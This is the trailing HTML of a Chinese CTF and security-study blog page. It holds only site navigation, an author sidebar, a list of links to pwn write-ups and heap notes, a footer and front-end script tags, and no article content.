href="/2022/07/24/DASCTF7%E6%9C%88%E8%B5%8B%E8%83%BD%E8%B5%9Bpwn%20wp/" rel="bookmark" title="DASCTF7月赋能赛pwn wp">DASCTF7月赋能赛pwn wp</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="invincible"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">invincible</p>
  <div class="description" itemprop="description">凌恒山其若陋兮、</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">15</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">2</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">6</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="/default/" rel="section"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>

</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/2021/11/14/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982020-format_string/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/2022/02/02/%E5%88%A9%E7%94%A8realloc%E8%B0%83%E6%95%B4%E6%A0%88%E4%BD%BFone_gadget%E7%94%9F%E6%95%88/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/04/06/wustctf2020_babyfmt/" title="wustctf2020_babyfmt">wustctf2020_babyfmt</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/09/03/babyrop/" title="标准32位程序ROP流程和c语言转义字符">标准32位程序ROP流程和c语言转义字符</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/11/29/SCU%E6%96%B0%E7%94%9F%E8%B5%9B2021/" title="SCU新生赛2021 pwn wp">SCU新生赛2021 pwn wp</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/09/25/%E7%94%B5%E7%A7%91%E6%96%B0%E7%94%9F%E8%B5%9B/" title="电科新生赛">电科新生赛</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="分类于 学习笔记">学习笔记</a>
</div>

    <span><a href="/2021/10/24/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-chunk%20overlapping/" title="堆学习-Chunk Overlapping">堆学习-Chunk Overlapping</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/07/11/2022%E8%93%9D%E5%B8%BDpwn%20wp/" title="2022蓝帽pwn wp">2022蓝帽pwn wp</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="分类于 学习笔记">学习笔记</a>
</div>

    <span><a href="/2021/10/30/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-UAF/" title="堆学习-UAF">堆学习-UAF</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/08/20/string/" title="攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解">攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/02/02/%E5%88%A9%E7%94%A8realloc%E8%B0%83%E6%95%B4%E6%A0%88%E4%BD%BFone_gadget%E7%94%9F%E6%95%88/" title="利用realloc调整栈使one_gadget生效">利用realloc调整栈使one_gadget生效</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/07/15/DSCTF%E9%83%A8%E5%88%86wp/" title="DSCTF pwn 部分wp">DSCTF pwn 部分wp</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2022</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">invincible @ Nirvana</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2021/11/29/SCU新生赛2021/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
